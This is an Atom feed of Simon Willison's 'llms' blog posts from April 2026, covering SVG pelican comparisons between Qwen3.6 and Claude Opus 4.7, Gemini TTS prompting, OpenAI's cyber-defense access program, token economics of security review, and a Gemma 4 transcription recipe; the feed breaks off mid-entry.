<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: llms</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/llms.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-16T17:16:52+00:00</updated><author><name>Simon Willison</name></author><entry><title>Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7</title><link href="https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag" rel="alternate"/><published>2026-04-16T17:16:52+00:00</published><updated>2026-04-16T17:16:52+00:00</updated><id>https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag</id><summary type="html">
    &lt;p&gt;For anyone who has been taking my &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;pelican riding a bicycle benchmark&lt;/a&gt; seriously as a robust way to test models, here are pelicans from this morning's two big model releases - &lt;a href="https://qwen.ai/blog?id=qwen3.6-35b-a3b"&gt;Qwen3.6-35B-A3B from Alibaba&lt;/a&gt; and &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;Claude Opus 4.7 from Anthropic&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the Qwen 3.6 pelican, generated using &lt;a href="https://huggingface.co/unsloth/Qwen3.6-35B-A3B-GGUF/blob/main/Qwen3.6-35B-A3B-UD-Q4_K_S.gguf"&gt;this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf&lt;/a&gt; quantized model by Unsloth, running on my MacBook Pro M5 via &lt;a href="https://lmstudio.ai/"&gt;LM Studio&lt;/a&gt; (and the &lt;a href="https://github.com/agustif/llm-lmstudio"&gt;llm-lmstudio&lt;/a&gt; plugin) - &lt;a href="https://gist.github.com/simonw/4389d355d8e162bc6e4547da214f7dd2"&gt;transcript here&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/Qwen3.6-35B-A3B-UD-Q4_K_S-pelican.png" alt="The bicycle frame is the correct shape. There are clouds in the sky. The pelican has a dorky looking pouch. A caption on the ground reads Pelican on a Bicycle!" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And here's one I got from Anthropic's &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;brand new Claude Opus 4.7&lt;/a&gt; (&lt;a href="https://gist.github.com/simonw/afcb19addf3f38eb1996e1ebe749c118"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican.png" alt="The bicycle frame is entirely the wrong shape. No clouds, a yellow sun. The pelican is looking behind itself, and has a less pronounced pouch than I would like." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I'm giving this one to Qwen 3.6. Opus managed to mess up the bicycle frame!&lt;/p&gt;
&lt;p&gt;I tried Opus a second time passing &lt;code&gt;thinking_level: max&lt;/code&gt;. It didn't do much better (&lt;a href="https://gist.github.com/simonw/7566e04a81accfb9affda83451c0f363"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican-max.png" alt="The bicycle frame is entirely the wrong shape but in a different way. Lines are more bold. Pelican looks a bit more like a pelican." style="max-width: 100%;" /&gt;&lt;/p&gt;

&lt;h4 id="i-dont-think-qwen-are-cheating"&gt;I don't think Qwen are cheating&lt;/h4&gt;
&lt;p&gt;A lot of people are &lt;a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/"&gt;convinced that the labs train for my stupid benchmark&lt;/a&gt;. I don't think they do, but honestly this result did give me a little glint of suspicion. So I'm burning one of my secret backup tests - here's what I got from Qwen3.6-35B-A3B and Opus 4.7 for "Generate an SVG of a flamingo riding a unicycle":&lt;/p&gt;

&lt;div style="display: flex; gap: 4px;"&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Qwen3.6-35B-A3B&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/f1d1ff01c34dda5fdedf684cfc430d92"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/qwen-flamingo.png" alt="The unicycle spokes are too long. The flamingo has sunglasses, a bowtie and appears to be smoking a cigarette. It has two heart emoji surrounding the caption Flamingo on a Unicycle. It has a lot of charisma." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Opus 4.7&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/35121ad5dcf23bf860397a103ae88d50"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/opus-flamingo.png" alt="The unicycle has a black wheel. The flamingo is a competent if slightly dull vector illustration of a flamingo. It has no flair." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
&lt;/div&gt;


&lt;p&gt;I'm giving this one to Qwen too, partly for the excellent &lt;code&gt;&amp;lt;!-- Sunglasses on flamingo! --&amp;gt;&lt;/code&gt; SVG comment.&lt;/p&gt;

&lt;h4 id="what-can-we-learn-from-this-"&gt;What can we learn from this?&lt;/h4&gt;
&lt;p&gt;The pelican benchmark has always been meant as a joke - it's mainly a statement on how obtuse and absurd the task of comparing these models is.&lt;/p&gt;
&lt;p&gt;The weird thing about that joke is that, for the most part, there has been a direct correlation between the quality of the pelicans produced and the general usefulness of the models. Those &lt;a href="https://simonwillison.net/2024/Oct/25/pelicans-on-a-bicycle/"&gt;first pelicans from October 2024&lt;/a&gt; were junk. The &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;more recent entries&lt;/a&gt; have generally been much, much better - to the point that Gemini 3.1 Pro produces &lt;a href="https://simonwillison.net/2026/Feb/19/gemini-31-pro/"&gt;illustrations you could actually use somewhere&lt;/a&gt;, provided you had a pressing need to illustrate a pelican riding a bicycle.&lt;/p&gt;
&lt;p&gt;Today, even that loose connection to utility has been broken. I have enormous respect for Qwen, but I very much doubt that a 21GB quantized version of their latest model is more powerful or useful than Anthropic's latest proprietary release.&lt;/p&gt;
&lt;p&gt;If the thing you need is an SVG illustration of a pelican riding a bicycle though, right now Qwen3.6-35B-A3B running on a laptop is a better bet than Opus 4.7!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/qwen"&gt;qwen&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="anthropic"/><category term="claude"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="qwen"/><category term="generative-ai"/><category term="lm-studio"/><category term="llm-release"/></entry><entry><title>Gemini 3.1 Flash TTS</title><link href="https://simonwillison.net/2026/Apr/15/gemini-31-flash-tts/#atom-tag" rel="alternate"/><published>2026-04-15T17:13:14+00:00</published><updated>2026-04-15T17:13:14+00:00</updated><id>https://simonwillison.net/2026/Apr/15/gemini-31-flash-tts/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-tts/"&gt;Gemini 3.1 Flash TTS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google released Gemini 3.1 Flash TTS today, a new text-to-speech model that can be directed using prompts.&lt;/p&gt;
&lt;p&gt;It's exposed via the standard Gemini API using &lt;code&gt;gemini-3.1-flash-tts-preview&lt;/code&gt; as the model ID, but it can only output audio.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://ai.google.dev/gemini-api/docs/speech-generation#transcript-tags"&gt;prompting guide&lt;/a&gt; is surprising, to say the least. Here's their example prompt to generate just a few short sentences of audio:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# AUDIO PROFILE: Jaz R.
## "The Morning Hype"

## THE SCENE: The London Studio
It is 10:00 PM in a glass-walled studio overlooking the moonlit London skyline, but inside, it is blindingly bright. The red "ON AIR" tally light is blazing. Jaz is standing up, not sitting, bouncing on the balls of their heels to the rhythm of a thumping backing track. Their hands fly across the faders on a massive mixing desk. It is a chaotic, caffeine-fueled cockpit designed to wake up an entire nation.

### DIRECTOR'S NOTES
Style:
* The "Vocal Smile": You must hear the grin in the audio. The soft palate is always raised to keep the tone bright, sunny, and explicitly inviting.
* Dynamics: High projection without shouting. Punchy consonants and elongated vowels on excitement words (e.g., "Beauuutiful morning").

Pace: Speaks at an energetic pace, keeping up with the fast music.  Speaks with A "bouncing" cadence. High-speed delivery with fluid transitions — no dead air, no gaps.

Accent: Jaz is from Brixton, London

### SAMPLE CONTEXT
Jaz is the industry standard for Top 40 radio, high-octane event promos, or any script that requires a charismatic Estuary accent and 11/10 infectious energy.

#### TRANSCRIPT
[excitedly] Yes, massive vibes in the studio! You are locked in and it is absolutely popping off in London right now. If you're stuck on the tube, or just sat there pretending to work... stop it. Seriously, I see you.
[shouting] Turn this up! We've got the project roadmap landing in three, two... let's go!
&lt;/code&gt;&lt;/pre&gt;
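&lt;p&gt;For reference, here's roughly what a direct REST call wrapping that prompt might look like - a sketch that assumes the preview model accepts the same &lt;code&gt;generateContent&lt;/code&gt; request shape (&lt;code&gt;responseModalities&lt;/code&gt;, &lt;code&gt;speechConfig&lt;/code&gt;, the &lt;code&gt;Kore&lt;/code&gt; voice name) as Google's earlier TTS models:&lt;/p&gt;

```json
{
  "contents": [
    {"parts": [{"text": "# AUDIO PROFILE: Jaz R.\n## \"The Morning Hype\"\n(rest of the prompt above)"}]}
  ],
  "generationConfig": {
    "responseModalities": ["AUDIO"],
    "speechConfig": {
      "voiceConfig": {
        "prebuiltVoiceConfig": {"voiceName": "Kore"}
      }
    }
  }
}
```

&lt;p&gt;If it matches the existing TTS models, you POST that to the model's &lt;code&gt;:generateContent&lt;/code&gt; endpoint with your API key and the audio comes back base64-encoded in the response.&lt;/p&gt;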
&lt;p&gt;Here's what I got using that example prompt:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-london.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;Then I modified it to say "Jaz is from Newcastle" and "... requires a charismatic Newcastle accent" and got this result:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-newcastle.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;Here's Exeter, Devon for good measure:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-devon.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;I &lt;a href="https://gemini.google.com/share/dd0fba5a83c4"&gt;had Gemini 3.1 Pro&lt;/a&gt; vibe code &lt;a href="https://tools.simonwillison.net/gemini-flash-tts"&gt;this UI for trying it out&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a &amp;quot;Gemini 3.1 Flash TTS&amp;quot; web application interface. At the top is an &amp;quot;API Key&amp;quot; field with a masked password. Below is a &amp;quot;TTS Mode&amp;quot; section with a dropdown set to &amp;quot;Multi-Speaker (Conversation)&amp;quot;. &amp;quot;Speaker 1 Name&amp;quot; is set to &amp;quot;Joe&amp;quot; with &amp;quot;Speaker 1 Voice&amp;quot; set to &amp;quot;Puck (Upbeat)&amp;quot;. &amp;quot;Speaker 2 Name&amp;quot; is set to &amp;quot;Jane&amp;quot; with &amp;quot;Speaker 2 Voice&amp;quot; set to &amp;quot;Kore (Firm)&amp;quot;. Under &amp;quot;Script / Prompt&amp;quot; is a tip reading &amp;quot;Tip: Format your text as a script using the Exact Speaker Names defined above.&amp;quot; The script text area contains &amp;quot;TTS the following conversation between Joe and Jane:\n\nJoe: How's it going today Jane?\nJane: [yawn] Not too bad, how about you?&amp;quot; A blue &amp;quot;Generate Audio&amp;quot; button is below. At the bottom is a &amp;quot;Success!&amp;quot; message with an audio player showing 00:00 / 00:06 and a &amp;quot;Download WAV&amp;quot; link." src="https://static.simonwillison.net/static/2026/gemini-flash-tts.jpg" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/text-to-speech"&gt;text-to-speech&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;



</summary><category term="text-to-speech"/><category term="prompt-engineering"/><category term="gemini"/><category term="llm-release"/><category term="tools"/><category term="google"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/></entry><entry><title>Trusted access for the next era of cyber defense</title><link href="https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag" rel="alternate"/><published>2026-04-14T21:23:59+00:00</published><updated>2026-04-14T21:23:59+00:00</updated><id>https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/"&gt;Trusted access for the next era of cyber defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;OpenAI's answer to &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; appears to be a new model called GPT-5.4-Cyber:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In preparation for increasingly more capable models from OpenAI over the next few months, we are fine-tuning our models specifically to enable defensive cybersecurity use cases, starting today with a variant of GPT‑5.4 trained to be cyber-permissive: GPT‑5.4‑Cyber.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They're also extending a program they launched in February (which I had missed) called &lt;a href="https://openai.com/index/trusted-access-for-cyber/"&gt;Trusted Access for Cyber&lt;/a&gt;, where users can verify their identity (via a photo of a government-issued ID processed by &lt;a href="https://withpersona.com/"&gt;Persona&lt;/a&gt;) to gain "reduced friction" access to OpenAI's models for cybersecurity work.&lt;/p&gt;
&lt;p&gt;Honestly, this OpenAI announcement is difficult to follow. Unsurprisingly they don't mention Anthropic at all, but much of the piece emphasizes their many years of existing cybersecurity work and their goal to "democratize access" to these tools, hence the emphasis on that self-service verification flow from February.&lt;/p&gt;
&lt;p&gt;If you want access to their best security tools you still need to go through an extra Google Form application process though, which doesn't feel particularly different to me from Anthropic's &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47770770"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/><category term="openai"/><category term="ai"/><category term="llms"/><category term="anthropic"/></entry><entry><title>Cybersecurity Looks Like Proof of Work Now</title><link href="https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag" rel="alternate"/><published>2026-04-14T19:41:48+00:00</published><updated>2026-04-14T19:41:48+00:00</updated><id>https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2026/04/14/cybersecurity-is-proof-of-work-now.html"&gt;Cybersecurity Looks Like Proof of Work Now&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The UK's AI Safety Institute recently published &lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities"&gt;Our evaluation of Claude Mythos Preview’s cyber capabilities&lt;/a&gt;, their own independent analysis of &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt;, which backs up Anthropic's claims that it is exceptionally effective at identifying security vulnerabilities.&lt;/p&gt;
&lt;p&gt;Drew Breunig notes that AISI's report shows that the more tokens (and hence money) they spent the better the result they got, which leads to a strong economic incentive to spend as much as possible on security reviews:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If Mythos continues to find exploits so long as you keep throwing money at it, security is reduced to a brutally simple equation: &lt;strong&gt;to harden a system you need to spend more tokens discovering exploits than attackers will spend exploiting them&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An interesting result of this is that open source libraries become &lt;em&gt;more&lt;/em&gt; valuable, since the tokens spent securing them can be shared across all of their users. This directly counters the idea that the low cost of vibe-coding up a replacement for an open source library makes those open source projects less attractive.&lt;/p&gt;
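&lt;p&gt;The arithmetic here is trivial but worth making explicit. A toy sketch - numbers invented for illustration, not from AISI's report:&lt;/p&gt;

```python
def hardening_margin(defender_tokens, attacker_tokens):
    """Drew's condition as arithmetic: a system is hardened when
    defenders spend more tokens finding exploits than attackers do,
    i.e. when this margin is positive."""
    return defender_tokens - attacker_tokens

def review_cost_per_project(review_tokens, dependent_projects):
    """The open source advantage: one security review is amortized
    across every project that depends on the library."""
    return review_tokens / dependent_projects

# Invented numbers: a 10M-token review shared by 1,000 dependents
# costs the ecosystem 10,000 tokens per project.
per_project = review_cost_per_project(10_000_000, 1_000)
```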


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;



</summary><category term="drew-breunig"/><category term="open-source"/><category term="generative-ai"/><category term="ai-security-research"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/></entry><entry><title>Steve Yegge</title><link href="https://simonwillison.net/2026/Apr/13/steve-yegge/#atom-tag" rel="alternate"/><published>2026-04-13T20:59:00+00:00</published><updated>2026-04-13T20:59:00+00:00</updated><id>https://simonwillison.net/2026/Apr/13/steve-yegge/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;a href="https://twitter.com/steve_yegge/status/2043747998740689171"&gt;Steve Yegge&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I was chatting with my buddy at Google, who's been a tech director there for about 20 years, about their AI adoption. Craziest convo I've had all year.&lt;/p&gt;
&lt;p&gt;The TL;DR is that Google engineering appears to have the same AI adoption footprint as John Deere, the tractor company. Most of the industry has the same internal adoption curve: 20% agentic power users, 20% outright refusers, 60% still using Cursor or equivalent chat tool. It turns out Google has this curve too. [...]&lt;/p&gt;
&lt;p&gt;There has been an industry-wide hiring freeze for 18+ months, during which time nobody has been moving jobs. So there are no clued-in people coming in from the outside to tell Google how far behind they are, how utterly mediocre they have become as an eng org.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://twitter.com/addyosmani/status/2043812343508021460"&gt;Addy Osmani&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;On behalf of @Google, this post doesn't match the state of agentic coding at our company. Over 40K SWEs use agentic coding weekly here. Googlers have access to our own versions of @antigravity, @geminicli, custom models, skills, CLIs and MCPs for our daily work. Orchestrators, agent loops, virtual SWE teams and many other systems are actively available to folks. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://twitter.com/demishassabis/status/2043867486320222333"&gt;Demis Hassabis&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Maybe tell your buddy to do some actual work and to stop spreading absolute nonsense. This post is completely false and just pure clickbait.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/addy-osmani"&gt;addy-osmani&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/steve-yegge"&gt;steve-yegge&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="addy-osmani"/><category term="steve-yegge"/><category term="google"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Bryan Cantrill</title><link href="https://simonwillison.net/2026/Apr/13/bryan-cantrill/#atom-tag" rel="alternate"/><published>2026-04-13T02:44:24+00:00</published><updated>2026-04-13T02:44:24+00:00</updated><id>https://simonwillison.net/2026/Apr/13/bryan-cantrill/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://bcantrill.dtrace.org/2026/04/12/the-peril-of-laziness-lost/"&gt;&lt;p&gt;The problem is that LLMs inherently &lt;strong&gt;lack the virtue of laziness&lt;/strong&gt;. Work costs nothing to an LLM. LLMs do not feel a need to optimize for their own (or anyone's) future time, and will happily dump more and more onto a layercake of garbage. Left unchecked, LLMs will make systems larger, not better &amp;mdash; appealing to perverse vanity metrics, perhaps, but at the cost of everything that matters.&lt;/p&gt;
&lt;p&gt;As such, LLMs highlight how essential our human laziness is: our finite time &lt;strong&gt;forces&lt;/strong&gt; us to develop crisp abstractions in part because we don't want to waste our (human!) time on the consequences of clunky ones.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://bcantrill.dtrace.org/2026/04/12/the-peril-of-laziness-lost/"&gt;Bryan Cantrill&lt;/a&gt;, The peril of laziness lost&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/bryan-cantrill"&gt;bryan-cantrill&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;



</summary><category term="bryan-cantrill"/><category term="ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="generative-ai"/></entry><entry><title>Gemma 4 audio with MLX</title><link href="https://simonwillison.net/2026/Apr/12/mlx-audio/#atom-tag" rel="alternate"/><published>2026-04-12T23:57:53+00:00</published><updated>2026-04-12T23:57:53+00:00</updated><id>https://simonwillison.net/2026/Apr/12/mlx-audio/#atom-tag</id><summary type="html">
    &lt;p&gt;Thanks to a &lt;a href="https://twitter.com/RahimNathwani/status/2039961945613209852"&gt;tip from Rahim Nathwani&lt;/a&gt;, here's a &lt;code&gt;uv run&lt;/code&gt; recipe for transcribing an audio file on macOS using the 10.28 GB &lt;a href="https://huggingface.co/google/gemma-4-E2B"&gt;Gemma 4 E2B model&lt;/a&gt; with MLX and &lt;a href="https://github.com/Blaizzy/mlx-vlm"&gt;mlx-vlm&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uv run --python 3.13 --with mlx_vlm --with torchvision --with gradio \
  mlx_vlm.generate \
  --model google/gemma-4-e2b-it \
  --audio file.wav \
  --prompt "Transcribe this audio" \
  --max-tokens 500 \
  --temperature 1.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/demo-audio-for-gemma.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;I tried it on &lt;a href="https://static.simonwillison.net/static/2026/demo-audio-for-gemma.wav"&gt;this 14 second &lt;code&gt;.wav&lt;/code&gt; file&lt;/a&gt; and it output the following:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This front here is a quick voice memo. I want to try it out with MLX VLM. Just going to see if it can be transcribed by Gemma and how that works.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(That was supposed to be "This right here..." and "... how well that works" but I can hear why it misinterpreted that as "front" and "how that works".)&lt;/p&gt;
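&lt;p&gt;Eyeballing transcription slips like that gets tedious, so a quick word-level diff - a sketch using Python's standard &lt;code&gt;difflib&lt;/code&gt;, not part of mlx-vlm - makes the substitutions explicit:&lt;/p&gt;

```python
import difflib

def transcript_diffs(expected, actual):
    """Return (expected_words, actual_words) pairs for each span
    where the transcript diverges from what was actually said."""
    exp, act = expected.lower().split(), actual.lower().split()
    matcher = difflib.SequenceMatcher(a=exp, b=act)
    return [
        (" ".join(exp[i1:i2]), " ".join(act[j1:j2]))
        for op, i1, i2, j1, j2 in matcher.get_opcodes()
        if op != "equal"
    ]
```

&lt;p&gt;Running it on "this right here is a quick voice memo" against Gemma's "this front here is a quick voice memo" reports the single &lt;code&gt;("right", "front")&lt;/code&gt; substitution.&lt;/p&gt;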

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mlx"&gt;mlx&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/speech-to-text"&gt;speech-to-text&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;



</summary><category term="uv"/><category term="mlx"/><category term="ai"/><category term="gemma"/><category term="llms"/><category term="speech-to-text"/><category term="python"/><category term="generative-ai"/></entry><entry><title>ChatGPT voice mode is a weaker model</title><link href="https://simonwillison.net/2026/Apr/10/voice-mode-is-weaker/#atom-tag" rel="alternate"/><published>2026-04-10T15:56:02+00:00</published><updated>2026-04-10T15:56:02+00:00</updated><id>https://simonwillison.net/2026/Apr/10/voice-mode-is-weaker/#atom-tag</id><summary type="html">
    &lt;p&gt;I think it's non-obvious to many people that the OpenAI voice mode runs on a much older, much weaker model - it feels like the AI that you can talk to should be the smartest AI but it really isn't.&lt;/p&gt;
&lt;p&gt;If you ask ChatGPT voice mode for its knowledge cutoff date it tells you April 2024 - it's a GPT-4o era model.&lt;/p&gt;
&lt;p&gt;This thought inspired by &lt;a href="https://twitter.com/karpathy/status/2042334451611693415"&gt;this Andrej Karpathy tweet&lt;/a&gt; about the growing gap in understanding of AI capability based on the access points and domains people are using the models with:&lt;/p&gt;
&lt;blockquote&gt;
